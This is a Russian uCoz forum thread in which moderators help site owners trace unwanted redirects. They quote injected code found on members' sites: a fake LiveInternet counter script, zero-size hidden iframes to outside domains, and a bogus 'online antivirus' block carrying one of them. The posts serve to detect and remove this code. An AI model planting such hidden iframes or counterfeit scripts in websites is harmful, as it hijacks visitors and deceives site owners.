Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16 02 Фев 2012
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
Wvi2dam
Сообщений: 3
Репутация: 1
Уровень замечаний:

Сообщение # 31 | 18:51:00 20 Фев 2012
­
Quote (bakar3730)
вобше не как не заходит на сайт пишет это:К сожалению, Google Chrome не может открыть страницу www.vayclub.org.
Снова откройте страницу: www.­vayclub.­org
Возможные действия:
Открыть кэшированную копию страницы www.­vayclub.­org.
Искать в Google:


vayclub.­org -открывается.
bakar3730, если у Вас не открывается сайт пишите в эту тему приведя:
адрес сайта и номер сервера где расположен сайт например s10
результаты трассировки
провайдера и город
Ваш IP
Сообщение отредактировал Wvi2dam - Понедельник, 20 Фев 2012, 18:58:01
bakar3730
Сообщений: 8
Репутация: 0

Сообщение # 32 | 23:43:21 20 Фев 2012
Теперь все стало работать вчера что то не заходил уменя сегодня тоже теперь все ок,спросил у некоторый пользователя сайта уних тоже не открывался вчера... Спасибо всем и тебе тоже Wvi2dam,
Teplonebes
Сообщений: 2
Репутация: 0

Сообщение # 33 | 04:08:56 24 Фев 2012
в данной теме оказывается помощь только сайтам расположенным в системе uCoz
Сообщение отредактировал webanet - Пятница, 24 Фев 2012, 15:46:56
Selena
Сообщений: 15657
Репутация: 1100

Сообщение # 34 | 15:44:10 24 Фев 2012
Teplonebes, с немобильного не перекидывает. Возможно это намёк на то, что браузер надо обновить. То есть ПО мобильного "шутит".
Отправляя сообщение о помощи, приводите ссылку на свой сайт. Это не считается рекламой, зато снимает массу вопросов.
Teplonebes
Сообщений: 2
Репутация: 0

Сообщение # 35 | 16:48:10 24 Фев 2012
Нет, с другими то сайтами не шутит,а только с одним..
GrozaZool
Сообщений: 3
Репутация: 0

Сообщение # 36 | 15:23:26 03 Мар 2012
В фоновой вкладке открывается эта ссылка http://churl.biz/click/body.php?id=4&hash=fc3183f741afd2e27df0c1fd468b29c8 облазил всё... не нашёл, помогите найти где этот код спрятан
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 37 | 15:26:30 03 Мар 2012
GrozaZool, адрес сайта дайте где наблюдается проблема
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
GrozaZool
Сообщений: 3
Репутация: 0

Сообщение # 38 | 15:43:06 03 Мар 2012
упс) написать забыл... событие происходит на сайте http://isofter.ucoz.com/ - проверьте где на этом сайте расположен вредоносная ссылка

Добавлено (03-Мар-2012, 15:38:27)
---------------------------------------------
webanet, http://isofter.ucoz.com

Добавлено (03-Мар-2012, 15:43:06)
---------------------------------------------
я допустим зашёл через Хром в режиме инкогнито, кликнул на сайт например на статью эта чёртова реклама открывается...я её не ставил. там должно открыватся тока от advmaker и mediaunder - если что то из этого вреднокодит (это mediaunder может быть только) напишите где этот скрипт находится которые переводит... буду очень благодарен

bandjuk
Сообщений: 6815
Репутация: 2398
Уровень замечаний:

Сообщение # 39 | 15:48:37 03 Мар 2012
GrozaZool, Аваст матерится на
http://counter.yadre.eu/hit.js
Сообщение отредактировал bandjuk - Суббота, 03 Мар 2012, 15:50:09
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 40 | 15:51:15 03 Мар 2012
GrozaZool, медиаундер находится в конце кода
Code
<!-- mediaunder Start -->
<script type="text/javascript">
var ref = escape(document.referrer);
document.write('<scr' + 'ipt type="text/javascript" src="http://mediaunder.org/scode.php?site=5030&ref=' + ref + '"></scr' + 'ipt>')
</script>
<!-- mediaunder End -->

откройте шаблон страницы сайта в самом низу. там же реклама от http://am10.ru/

в верхней части сайта удалите вот это

</head>

Quote
<!--LiveInternet counter--><script type="text/javascript">
document.write("<script type=\"text/javascript\" "+
"src='http://counter.yadre.eu/hit.js?t11.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"'><"+"/sc"+"ript>")
</script><!--/LiveInternet-->
это фальшивка счетчика ливы

фальшивку удалить обязательно! удалите и потом отпишитесь о результатх
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
GrozaZool
Сообщений: 3
Репутация: 0

Сообщение # 41 | 16:23:49 03 Мар 2012
спасибо огромное bandjuk, и webanet, да да...это та самая ссылка...вот он зараза куда ссылку спрятал;)

Добавлено (03-Мар-2012, 16:08:30)
---------------------------------------------
я зашёл на LiveInternet и хотел заново взять код. но там тот же самый код
[code]
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t11.10;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet-->
и он так же ведёт на сайт. мне что теперь статистику liveinternet удалить?

Добавлено (03-Мар-2012, 16:16:12)
---------------------------------------------
не...ссылка выходит даже когда liveinternet убрал

Добавлено (03-Мар-2012, 16:19:17)
---------------------------------------------
а да...у вверху и внизу был код... удалил

Добавлено (03-Мар-2012, 16:23:49)
---------------------------------------------
Спасибо. Проблема решена. Зашёл на LiveInternet скопировал код заново.
Вверху убрал, и внизу тоже было и тоже убрал. Больше не выходит;)
Большое спасибо!!

prizrak7707
Сообщений: 3
Репутация: 0

Сообщение # 42 | 16:43:48 02 Апр 2012
При заходе на сайт http://screensaver-wd.ucoz.ru меня перекидывает на другой сайт http://www.pro-evolution.ru/ под логином и под гостем
bandjuk
Сообщений: 6815
Репутация: 2398
Уровень замечаний:

Сообщение # 43 | 17:22:07 02 Апр 2012
prizrak7707, в блоке "Антивирус онлайн"
удали фрейм:
<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://pro-evolution.ru/"></iframe>
fflesh
Сообщений: 1784
Репутация: 1314

Сообщение # 44 | 17:23:21 02 Апр 2012
Quote (prizrak7707)
При заходе на сайт http://screensaver-wd.ucoz.ru меня перекидывает на другой

Вот это:
Найдите и удалите:
Quote
<form method="POST" id="drweb_online_scan_form"
enctype="multipart/form-data" action="http://online.drweb.com/result" target="drweb_scan_form_popup_window">
<div style="width: 190px; height: 105px; background: url(http://plusoft.ru/images/dr_web/fon_white.gif)"><div style="padding: 50px 10px 0 10px;"><iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://pro-evolution.ru/"></iframe><div align="center"><input name="file" id="file_selection_input" type="file" size="15"></div>
<div style="padding-top: 5px; text-align: center"><input type="image" onclick="return do_scan_file_01();" src="http://plusoft.ru/images/dr_web/button.gif" width="121" height="21"></div></div></div></form>

Заодно и вот это:
Quote
<tr><td class="topBorder" style="padding:3px;" bgcolor="#F4F4F4"><!-- <bc> --><!-- Put this script tag to the <head> of your page --><a href="http://v-zakladki.ru/"> <a class="mrc__share" href="http://platform.mail.ru/share">В Мой Мир</a><script src="http://cdn.connect.mail.ru/js/share/2/share.js" type="text/javascript" charset="UTF-8"></script><br /><br /><script type="text/javascript" src="http://vkontakte.ru/js/api/share.js?9" charset="windows-1251"></script><!-- Put this script tag to the place, where the Share button will be -->
<script type="text/javascript"><!--
document.write(VK.Share.button(false,{type: "round", text: "Сохранить"}));
--></script><br /><script src="http://odnaknopka.ru/ok2.js" type="text/javascript"></script> </a><body style="margin:0px">
</iframe>

<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"
src="http://www.24lux.ru/">
</iframe><script src="http://ucozon.ru/SCRIN2/guirlande.js"></script>
<A title="Статусы" href="http://status-sotseti.ucoz.ru/" rel=sidebar onclick="window.external.addFavorite(location.href,'Афоризмы,цитаты,высказывания'); return false;"><img src="http://s002.radikal.ru/i197/1002/38/24471bf528a1.jpg" border="0" alt="" /></A>
<!-- </bc> --></td></tr>
<tr><td bgcolor="#E9ECF5"><img border="0" src="/.s/t/121/11.gif" width="190" height="21"></td></tr>
</table>
<div style="padding:3px"></div>
<!-- </block1> -->

-1
Всё написанное выше - моё личное мнение и на абсолютную правоту не претендует.
Есть вопросы лично ко мне - пиши сюда: http://likbezz.ru/forum/8
Сообщение отредактировал fflesh - Понедельник, 02 Апр 2012, 17:25:03
prizrak7707
Сообщений: 3
Репутация: 0

Сообщение # 45 | 17:40:32 02 Апр 2012
Спасибо огромное...помогло!!! Теперь захожу)))) А как то можно предотвратить такое на будущее?
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
Поиск: